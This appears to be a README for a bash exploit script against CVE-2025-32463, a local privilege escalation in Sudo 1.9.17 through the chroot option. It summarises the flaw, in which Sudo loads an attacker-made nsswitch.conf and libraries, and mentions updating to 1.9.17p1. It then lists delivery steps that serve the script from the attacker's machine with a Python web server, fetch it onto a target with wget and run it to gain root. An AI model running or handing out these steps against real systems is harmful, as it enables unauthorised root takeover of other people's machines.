
Bash exploit script for CVE-2025-32463, a local privilege escalation vulnerability in Sudo 1.9.17 via the chroot option, enabling root access on affected systems.
Sudo version 1.9.17 has a critical vulnerability (CVE-2025-32463) that allows local users to gain root access by exploiting the chroot option, which can lead to serious security risks. Users are advised to update to version 1.9.17p1 or later to mitigate this issue.
Overview of the Sudo 1.9.17 Vulnerability:-
The vulnerability in Sudo version 1.9.17, identified as CVE-2025-32463, is a critical flaw that allows local users to gain root access. This issue arises from a change in how Sudo handles the --chroot (-R) option, which is intended to isolate processes by changing their root directory.
How the Vulnerability Works:-
Path Resolution Issue: In versions 1.9.14 to 1.9.17, Sudo evaluates the --chroot option before checking user permissions. This allows attackers to control the environment and load malicious libraries.
Exploitation Steps:
An attacker creates a malicious nsswitch.conf file in a directory they control. They execute Sudo with the -R option, causing Sudo to load the attacker’s configuration and libraries, granting root access.
I have created a bash script "cwoot.sh" which after execution will directly elevate to root user.
Do the fwg:
Download the script from repo: git clone https://github.com/justjoeyking/CVE-2025-32463.git
In own machine : python3 -m http.server 8080
In target machine : wget http://<own_IP_address>:8080/cwoot.sh
In target machine : chmod 755 cwoot.sh
Exec script in target machine : ./cwoot.sh